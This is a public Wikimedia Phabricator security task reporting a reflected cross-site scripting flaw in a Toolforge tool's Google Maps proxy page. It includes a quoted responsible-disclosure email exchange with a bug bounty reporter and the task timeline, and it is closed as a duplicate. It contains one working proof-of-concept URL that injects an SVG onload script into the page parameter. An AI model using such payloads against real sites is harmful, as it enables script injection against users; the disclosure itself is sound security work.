Maniphest T198984

xss wp-world toolforge
Closed, DuplicatePublic
Actions

Assigned To

None

Authored By

	Bawolff
	Jul 6 2018, 6:07 PM

Description

exploit code

https://tools.wmflabs.org/wp-world/googlmaps-proxy.php?page=%27%22%3E%3C/SCRipt%3E%3CsVg/oNLoad=confirm(/xssposed/)%3E&output=classic



Le Fri, 6 Jul 2018 13:56:53 +0000,
Brian Wolff <bwolff@wikimedia.org> a écrit :


> Hi Lacroute.
> 
> Thank you for reporting a security issue - Unfortunately I can't seem
> to access the details of your report. Would you be able to email the
> details of the vulnerability tosecurity@wikimedia.org
> 
> Thanks,
> 
> Brian Wolff
> Wikimedia Security Team
> 
> On Fri, Jul 6, 2018 at 1:47 PM,lacroutelacroute@gmail.com <
> lacroutelacroute@gmail.com> wrote:  
> 
> > hello
> >
> >
> > hey
> >
> > iam bugbounty hunter
> > iam lacroute serge france
> > https://twitter.com/fakessh
> >
> > in condition standard responsable disclosure
> > happy bugbounty
> >
> > https://www.openbugbounty.org/reports/641446/
> >
> > regards
> >
> > serge

Event Timeline

Bawolff created this task.Jul 6 2018, 6:07 PM

Restricted Application added a subscriber: Aklapper. · View Herald TranscriptJul 6 2018, 6:07 PM

Bawolff added projects: Vuln-XSS, Toolforge.Jul 6 2018, 6:10 PM

Reedy closed this task as a duplicate of Restricted Task.Jul 6 2018, 10:58 PM

Bawolff changed the visibility from "Custom Policy" to "Public (No Login Required)".Jul 10 2018, 12:17 AM

• chasemp added a project: Security.Feb 10 2020, 10:52 PM

• chasemp removed a project: acl*security.Feb 20 2020, 8:12 PM

xss wp-world toolforgeClosed, DuplicatePublicActions

Description

Event Timeline

xss wp-world toolforge
Closed, DuplicatePublic
Actions